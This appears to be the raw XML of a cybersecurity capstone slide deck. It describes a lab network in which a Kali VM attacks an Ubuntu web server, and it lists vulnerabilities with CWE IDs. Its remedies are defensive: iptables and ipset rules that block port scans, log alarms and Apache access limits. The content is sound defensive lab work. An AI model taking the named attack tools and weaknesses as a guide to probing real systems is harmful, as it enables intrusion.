            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ipset create port_scanners hash:ip family inet hashsize 32768 maxelem 65536 timeout 600 </a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ipset create scanned_ports hash:ip,port family inet hashsize 32768 maxelem 65536 timeout 60</a:t>
            </a:r>
            <a:endParaRPr sz="8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50">
                <a:solidFill>
                  <a:srgbClr val="232629"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>And iptables rules</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="232629"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iptables -A INPUT -m state --state INVALID -j DROP </a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iptables -A INPUT -m state --state NEW -m set ! --match-set scanned_ports src,dst -m hashlimit --hashlimit-above 1/hour --hashlimit-burst 5 --hashlimit-mode srcip --hashlimit-name portscan --hashlimit-htable-expire 10000 -j SET --add-set port_scanners src --exist </a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iptables -A INPUT -m state --state NEW -m set --match-set port_scanners src -j DROP </a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iptables -A INPUT -m state --state NEW -j SET --add-set scanned_ports src,dst</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>networking - How to protect against port scanners? - Unix &amp; Linux Stack Exchange</a:t>
            </a:r>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="8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t>Using iptables will detect scans and block the IP addresses associated with them.</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50" name="Google Shape;1250;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1" name="Google Shape;1251;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We can create an alarm which tracks GET requests to the hidden directory. It could trigger every time a request is made in order to stay aware of access to the directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Google Shape;1252;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To keep unwanted actors from accessing the directory to begin with, we could start by purging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> site of any mention of the directory. We could also block all but a select few IPs who were determined to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>acceptable viewers of the directory by editing the configuration file at /etc/httpd/conf/httpd.conf.</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58" name="Google Shape;1258;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9" name="Google Shape;1259;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An alarm can be created which tracks the number of 401 HTTP status codes that come in. If over 10 401’s come in within 10 seconds.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;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Passwords can be made more robust to protect against brute force attacks. Requiring passwords over 12 characters in length which require at least 1 upper case letter, 1 lower case letter, 1 digit, and 1 other character should be suitable to make it orders of magnitude more difficult to successfully brute force attack.</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66" name="Google Shape;1266;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7" name="Google Shape;1267;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An alarm can be made which alerts when an IP connects with a url containing “webdav” and isn’t 192.168.1.150 or 192.168.1.1.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;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Similar to hardening against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unwanted actors from accessing the secret directory, we could block all but a select few IPs who were determined to be acceptable viewers of the directory by editing the configuration file at /etc/httpd/conf/httpd.conf.</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74" name="Google Shape;1274;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We can monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>whether or not an http requests use the PUT method while having access to the webdav file.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76" name="Google Shape;1276;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="45579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We add to the changes we made in the config file to harden against users connecting to the webdav directory by adding</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>&lt;LimitExcept GET POST HEAD&gt;deny from all   </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>&lt;/LimitExcept&gt;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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871000" y="1011300"/>
            <a:ext cx="2716200" cy="35220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sz="1000"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Range: 192.161.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="10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sz="1000"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>OS: Windows 10 Pro</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Hostname: ML-RefVm-684427</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IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>OS: Ubuntu 18.04.1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Hostname: server1</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IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Hostname: ELK</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IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>OS: Kali GNU/Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr sz="10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pic>
        <p:nvPicPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521175" y="679750"/>
            <a:ext cx="3891349" cy="4206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5" name="Google Shape;1065;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6" name="Google Shape;1066;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7" name="Google Shape;1067;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3" name="Google Shape;1073;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="398700" y="1091325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DE5969DB-620A-4678-A406-667909591162}</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Host VM used to operate Hyper-V Manager containing the other 3 VMs. Also used for Kibana analysis.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Gathers the logs generated by the Capstone VM beats and prepares them for analysis in Kibana.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server1 (Capstone)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Hosts a web server which is the target of attack for the Kali machine. Running several beats used by ELK for later analysis.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Uses several methods to attack the Capstone VM, including nmap, Hydra, and metasploit.</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 (Slide 1)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="Google Shape;1080;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6095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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1081" name="Google Shape;1081;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="454450" y="1006150"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DE5969DB-620A-4678-A406-667909591162}</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1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Directory Browsing</a:t>
                      </a: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i="1" lang="en" sz="1200" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE ID: 548</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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The directory listing is directly visible due to a lack of an index file. This can be considered a misconfiguration of the web server.</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Allowing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> the directory listing to be directly visible leaves the web server vulnerable to critical information gathering by attackers who can map out the directory structure and use web vulnerability scanners to discover directories not directly linked in the listing.</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lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exposure of Sensitive Information to an Unauthorized Actor</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE ID: 200</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Sensitive information is exposed to potential threat actors in several locations throughout the directory structure.</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t>Potential threat actors can use the sensitive information gathered through these exposures to drill deeper into sensitive directories and gain advantages which could ultimately lead to the harm of the company.</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lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Weak Password Requirements</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE ID: 521</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Strong passwords are not required for user accounts which have  access to sensitive directories.</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t>Weak password requirements leave a system vulnerable to brute force attacks, allowing potential threat actors to compromise user accounts and use the privileges obtained from these accounts to further drill into the system.</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 (Slide 2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6095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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1088" name="Google Shape;1088;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
